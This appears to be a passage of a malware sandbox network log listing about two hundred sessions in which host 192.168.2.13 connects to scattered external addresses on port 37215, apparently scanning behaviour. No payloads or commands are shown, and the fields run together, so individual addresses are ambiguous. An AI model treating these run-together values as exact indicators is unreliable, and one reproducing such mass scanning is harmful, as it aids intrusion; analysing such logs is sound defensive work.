                                                  18922192.168.2.1338232192.104.224.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18923192.168.2.1339728197.147.88.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18924192.168.2.1353736197.245.242.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18925192.168.2.1333196157.188.104.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18926192.168.2.134316041.150.47.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18927192.168.2.1357740197.186.212.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18928192.168.2.135810641.103.85.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18929192.168.2.1346850163.149.133.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18930192.168.2.135030641.159.189.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18931192.168.2.133308041.37.247.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18932192.168.2.1342492157.204.108.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18933192.168.2.1347332197.33.33.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18934192.168.2.134378679.5.19.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18935192.168.2.1332914157.197.239.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18936192.168.2.1335858157.44.146.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18937192.168.2.1333732106.191.185.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18938192.168.2.1358594157.58.137.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18939192.168.2.1342516157.194.217.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18940192.168.2.134171041.53.227.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18941192.168.2.1333902135.186.238.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18942192.168.2.1354052197.0.78.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18943192.168.2.135846641.175.113.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18944192.168.2.134593241.39.218.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18945192.168.2.133793041.23.84.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18946192.168.2.1358116197.159.200.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18947192.168.2.1334056184.166.115.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18948192.168.2.133554641.126.176.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18949192.168.2.1348072157.209.223.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18950192.168.2.1339240157.10.45.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18951192.168.2.1350522197.174.167.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18952192.168.2.1349084157.243.162.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18953192.168.2.1354388150.89.250.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18954192.168.2.136037068.111.138.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18955192.168.2.1354154157.100.244.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18956192.168.2.1348270113.212.139.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18957192.168.2.135641041.53.16.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18958192.168.2.1359464197.201.124.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18959192.168.2.134458641.191.98.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18960192.168.2.1336466157.210.241.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18961192.168.2.1349320157.56.208.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18962192.168.2.1334556197.142.181.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18963192.168.2.1350264163.38.22.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18964192.168.2.1339196197.36.245.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18965192.168.2.134153641.113.147.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18966192.168.2.1357568197.177.213.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18967192.168.2.1338862197.158.236.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18968192.168.2.1343680157.193.21.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18969192.168.2.1357786197.30.48.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18970192.168.2.1354968197.149.200.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18971192.168.2.1352372197.53.233.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18972192.168.2.1354882197.85.178.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18973192.168.2.1354682115.171.217.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18974192.168.2.1335658157.123.74.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18975192.168.2.133845289.229.73.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18976192.168.2.1342816111.108.164.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18977192.168.2.134983041.189.208.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18978192.168.2.1360118197.67.246.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18979192.168.2.134175872.13.194.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18980192.168.2.1352942108.231.123.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18981192.168.2.1355784197.239.15.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18982192.168.2.1341270157.2.167.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18983192.168.2.133988841.113.12.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18984192.168.2.134140463.178.113.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18985192.168.2.1347368157.22.106.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18986192.168.2.1334894197.88.27.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18987192.168.2.1338280197.214.147.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18988192.168.2.1334510157.242.31.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18989192.168.2.133868041.142.43.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18990192.168.2.1351280157.230.235.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18991192.168.2.1353860121.164.69.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18992192.168.2.1339588197.104.107.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18993192.168.2.135563241.179.233.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18994192.168.2.134414041.170.59.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18995192.168.2.1357606151.59.249.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18996192.168.2.133545041.234.66.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18997192.168.2.135826641.59.178.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18998192.168.2.1335272197.143.171.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18999192.168.2.1339676197.104.182.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19000192.168.2.1348450197.11.132.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19001192.168.2.1358064157.108.217.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19002192.168.2.13544621.195.208.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19003192.168.2.135889468.94.46.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19004192.168.2.135225690.113.30.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19005192.168.2.1335260157.113.178.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19006192.168.2.1346124197.171.227.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19007192.168.2.135991841.229.220.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19008192.168.2.135677641.28.4.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19009192.168.2.134250867.37.115.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19010192.168.2.1343244157.29.201.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19011192.168.2.135998439.10.19.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19012192.168.2.1353462157.125.69.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19013192.168.2.1356034157.171.24.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19014192.168.2.1342680157.34.148.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19015192.168.2.1335440157.192.243.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19016192.168.2.1345130157.163.124.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19017192.168.2.1356008157.141.99.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19018192.168.2.1337904157.113.136.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19019192.168.2.1350276142.106.1.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19020192.168.2.133281054.71.232.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19021192.168.2.1335188190.181.33.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19022192.168.2.1339106157.34.88.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19023192.168.2.133988041.114.95.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19024192.168.2.1353408197.181.66.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19025192.168.2.133868841.251.222.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19026192.168.2.1344040197.54.82.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19027192.168.2.1350786157.52.201.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19028192.168.2.1337698195.204.13.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19029192.168.2.1332828197.54.237.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19030192.168.2.135678441.83.196.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19031192.168.2.1340062197.31.140.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19032192.168.2.133347039.49.107.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19033192.168.2.134233041.161.40.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19034192.168.2.1353190157.96.6.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19035192.168.2.1360892157.197.193.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19036192.168.2.1351442157.132.65.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19037192.168.2.136032441.85.41.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19038192.168.2.134056098.163.83.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19039192.168.2.1351848197.0.116.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19040192.168.2.1356010199.120.177.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19041192.168.2.1354080197.183.108.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19042192.168.2.1360762197.101.41.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19043192.168.2.1360724197.152.40.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19044192.168.2.1349542157.32.123.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19045192.168.2.1340772157.75.78.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19046192.168.2.1336896197.177.237.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19047192.168.2.135619848.137.112.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19048192.168.2.133452061.154.190.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19049192.168.2.1346964157.118.134.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19050192.168.2.1337206185.193.253.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19051192.168.2.1358812219.168.197.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19052192.168.2.1354450157.35.211.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19053192.168.2.1335536118.20.27.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19054192.168.2.1353026198.84.16.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19055192.168.2.1341630140.120.138.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19056192.168.2.133591041.99.200.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19057192.168.2.135237641.215.190.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19058192.168.2.1355172157.129.232.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19059192.168.2.135892241.238.210.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19060192.168.2.1349044157.122.29.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19061192.168.2.134645875.36.83.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19062192.168.2.133365677.122.82.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19063192.168.2.1337414197.67.141.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19064192.168.2.1333856197.199.245.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19065192.168.2.1333598112.64.53.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19066192.168.2.1339368157.180.131.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19067192.168.2.1357120157.107.162.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19068192.168.2.133312641.197.19.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19069192.168.2.1358712180.93.96.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19070192.168.2.1348128157.189.112.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19071192.168.2.1359178106.15.210.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19072192.168.2.135780241.19.119.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19073192.168.2.135195241.93.9.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19074192.168.2.1347812183.207.241.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19075192.168.2.1359536157.19.226.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19076192.168.2.1347588162.201.206.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19077192.168.2.1348500125.5.225.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19078192.168.2.134896234.45.234.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19079192.168.2.1350088157.166.209.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19080192.168.2.1334078105.102.76.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19081192.168.2.1358288197.56.128.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19082192.168.2.1351672197.42.102.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19083192.168.2.135696241.242.196.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19084192.168.2.133545038.235.128.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19085192.168.2.1334220157.47.13.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19086192.168.2.135432699.169.253.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19087192.168.2.1349828197.234.15.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19088192.168.2.1339758157.254.44.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19089192.168.2.1355236157.217.193.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19090192.168.2.133413277.225.170.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19091192.168.2.1358838197.106.12.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19092192.168.2.1352024197.3.154.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19093192.168.2.1336556197.155.74.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19094192.168.2.1351918157.113.19.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19095192.168.2.135546841.88.127.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19096192.168.2.135381841.111.57.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19097192.168.2.1350182197.175.241.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19098192.168.2.1337726197.164.97.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19099192.168.2.1333604193.30.203.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19100192.168.2.1358186157.205.58.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19101192.168.2.1356718165.233.158.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19102192.168.2.134121641.57.219.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19103192.168.2.1333158197.217.139.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19104192.168.2.133726259.144.125.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19105192.168.2.1338230188.66.99.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19106192.168.2.1351774157.131.133.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19107192.168.2.1345750131.64.13.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19108192.168.2.133420041.41.230.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19109192.168.2.135786454.34.239.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19110192.168.2.1341752100.151.204.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19111192.168.2.1358858157.71.35.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19112192.168.2.1344668197.3.43.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19113192.168.2.1350412197.171.227.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19114192.168.2.1337554197.150.148.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19115192.168.2.1333416157.72.195.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19116192.168.2.134236486.139.153.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19117192.168.2.1344208197.5.69.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19118192.168.2.1352186114.86.192.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19119192.168.2.1337810197.26.133.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19120192.168.2.1354200182.144.85.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19121192.168.2.1344760157.186.122.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19122192.168.2.1337024219.162.176.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19123192.168.2.1360234197.140.8.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19124192.168.2.1356834157.16.158.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19125192.168.2.134582841.249.212.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19126192.168.2.135029449.199.84.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19127192.168.2.13599661.107.186.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19128192.168.2.1343938157.20.12.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19129192.168.2.1349202197.240.20.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19130192.168.2.1336256157.104.50.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19131192.168.2.1346170157.237.14.3837215
